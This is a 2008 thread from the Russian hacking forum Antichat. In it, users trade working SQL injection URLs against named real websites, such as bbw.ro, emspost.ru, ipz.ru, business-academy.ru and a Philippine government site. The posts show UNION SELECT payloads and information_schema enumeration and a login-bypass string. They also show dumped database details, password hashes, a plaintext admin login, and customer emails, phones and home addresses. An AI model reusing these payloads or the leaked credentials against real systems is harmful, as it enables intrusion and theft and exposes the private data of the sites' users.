Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.08.2008, 04:07
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.bbw.ro
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat_ws(0x203a20,ve rsion(),user(),database()),7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
админка тут http://www.bbw.ro/admin/login.php
version()= 5.0.45
user() = draft@localhost
database() = bbw
|
|
|
02.08.2008, 04:55
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
Провел на форуме:
5120686
Репутация:
531
|
|
Сообщение от Ponchik
emspost.ru
VERSION() 4.1.22-log
DATABASE() emspost_1
USER() emspost_1@localhost
Версия 4, такчто всё подобрано руками 
Сразу под парсер, разбивать по :::
Код:
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,name,company,email,city,address,phone,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT+0,1/*
http://emspost.ru/adm/ админка, но пассы хз где
http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0 x3a3a3a,id,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_u sers+LIMIT+1,1/*
эти не подходят
|
|
|
|
02.08.2008, 05:07
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Итак, вот что мне удалось обнаружить.
С помощью нехитрой фишки "TABLE_NAME", обнаруживаем 2 интересные таблицы под названиями "members" и "admin"
Надо было выяснить название колонок с помощью "COLUMN_NAME", я попробовал так:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='members'/*
Но не тут-то было, кавычки фильтруются, но как оказалось не совсем =)) А вот так:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=%27members%27/*
Всё работает замечательно.
Достаём интересные данные, из таблицы "members" под названиями "email" - мыло, "adresa" - домашний адрес, "parola" - типа так они пароль обозначили. "telefon" - домашний телефон.
Ну собственно выводим их:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(email,0x3a,parola,0x3a,telefon,0x3a,adresa),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+members+limit+1,1/*
В итоге "мыло:пасс:телефон:адрес" жаль цикл не пашет ;(
Теперь дальше самое интересное, таблица "admin" интересные колонки это username, и собственно parola
Выводим:
Код:
http://www.bbw.ro/articol.php?id=-51563+union+select+1,2,3,4,5,concat(username,0x3a,parola),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+FROM+admin+limit+0,1/*
И получаем данные для админки: bbw:qazxcv
В админке ковыряться не стал - не интересно.
Последний раз редактировалось Nightmarе; 02.08.2008 в 05:49..
|
|
|
|
02.08.2008, 07:19
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://ipz.ru
PR 5 Яндекс тИЦ 325
Система рейтингующей статистики - IPZ
SQL: http://www.ipz.ru/alltop.php?cat='
Полей - 1, таблица с юзверями - users
Выводим инфу о юзверях:
Код:
http://www.ipz.ru/alltop.php?cat=-1+UNION+SELECT+concat(login,0x3a,email,0x3a,password)+FROM+users+limit+0,1/*
Логин:Емайл:Пароль:*(расшиф ованный пароль)
consider1:consider@gips-s.ru:5a4c36e900fb4d0a947751e0c59d8661:7827887
А так-же пых-пыхМайАдмин: http://www.ipz.ru/phpmyadmin
Версия:Пользователь:База данных
5.0.22:admin_top@localhost:admin_top
|
|
|
|
02.08.2008, 10:51
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Business-academy.ru
http://www.business-academy.ru/lib.php?id=-1+union+select+1,table_name,table_schema,4,5+from+ information_schema.tables--
5 ветка и таблы..
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,nick,pass),3,4,5+f rom+auth--
business-academy.ru/auth.form.php
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5+from+affil_admin--
business-academy.ru/admin - 403
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,login,password),3, 4,5+from+affil_users+limit+0,1--
еще какието юзверы )
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,members_l_username ,member_login_key),3,4,5+from+ibf_members--
и форум... business-academy.ru/forum - IPB 2.2.2 - хотел шелл залить.. но пасс так не разшифровал:
lenar:ee0801a9fb2b272b10830d0ffcf8c589
red_bar0n:84c1b6bd2d4b190b1583e11bf4ccd929
s2sage:f7ea695c3b11000daedb0db1f7dd5619
http://www.business-academy.ru/lib.php?id=-1+union+select+1,concat_ws(0x3a,email,password),3, 4,5+from+srv11037_forum.users--
напоследок.. еще юзеры...
Lor-homeopat.ru - PR 4
http://lor-homeopat.ru/php/content.php?id=209+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19/*
Launion.gov.ph - PR 3
http://www.launion.gov.ph/index.php?option=com_remository&Itemid=99999999&fu nc=select&id=1&orderby=3&page=2
пытался чтот сделать... но (
Bbw.ro
http://www.bbw.ro/admin/login.php
login: admin' or 1=1/*
pass: любой
Последний раз редактировалось sabe; 03.08.2008 в 06:09..
|
|
|
|
02.08.2008, 12:29
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Ну что ж... Начну и я пожалуй:
qpogorod.ru
Код:
http://www.qpogorod.ru/raskazread.php?idArticle=-32+union+select+concat_ws(version(),0x3a,user()),2,3--
4.0.27
autoanry_cvet@v24.valuehost.ru
Сервер:
Apache/1.3.33 (Unix) mod_fastcgi/2.4.0 FrontPage/5.0.2.2623 PHP/4.3.10 mod_gzip/1.3.19.1a mod_ssl/2.8.22 OpenSSL/0.9.7b rus/PL30.20
P.S: админку не нашел, так что дальше не раскручивал. |
|
|
|
02.08.2008, 12:59
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
http://www.latinoreview.com/news.php?id=-1890+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21/*
version() - 4.1.20
user() - latinore_content@localhost
database() - latinore_content
http://www.greenshift.com/news.php?id=97+union+select+1,concat_ws(0x3a,user( ),database(),version()),3,4,5,6,7,8,9,10,11,12/*
version() - 4.1.21-standard
user() - root@localhost
database() - greenshift
http://www.a2k.org.ua/news.php?id=31+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38/*
version() - 4.1.22-standard
user() - boxnews_a2k@localhost
database() - boxnews_a2k
Последний раз редактировалось warlok; 02.08.2008 в 13:02..
|
|
|
|
02.08.2008, 15:45
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.krasota.ru
4.1.16-standard-log ::: krasota_v3@lbarbero-12.m-10.ru ::: krasota_v3
http://www.krasota.ru/krasota/news/show.htpl?id=7379+union+select+1,2,3,4,5,6,7,8,unh ex(hex(concat_ws(0x3a3a3a,version(),user(),databas e()))),10,11,12,13/*
таблички подобрать не смог...
админка тут http://www.krasota.ru/admin/
Последний раз редактировалось MirA; 02.08.2008 в 19:50..
|
|
|
|
02.08.2008, 17:54
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://www.lv
PR 6 Яндекс тИЦ 60
Судя по всему, какой-то латвийский каталог
Код:
http://www.lv/list.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),user(),0x3a,database()))),4,5,6/*
version() - 4.1.15-Debian_1ubuntu5-log
user() - welcome@92.240.65.129
database() - t_welcome
Раскрытие пути - /home/welcome/public_html/list.php
|
|
|
|
02.08.2008, 22:31
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
mind.textdriven.com
http://mind.textdriven.com/db/record.php?ID=1+union+select+1,version(),3,0x203a2 0,user(),0x203a20,database(),8,9,10,11,12,13,14,15--
Database : bpasanek_metabase.
Database Version: 4.1.22-log
User: bpasanek@localhost
__________________
BlackHat. MoDL
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
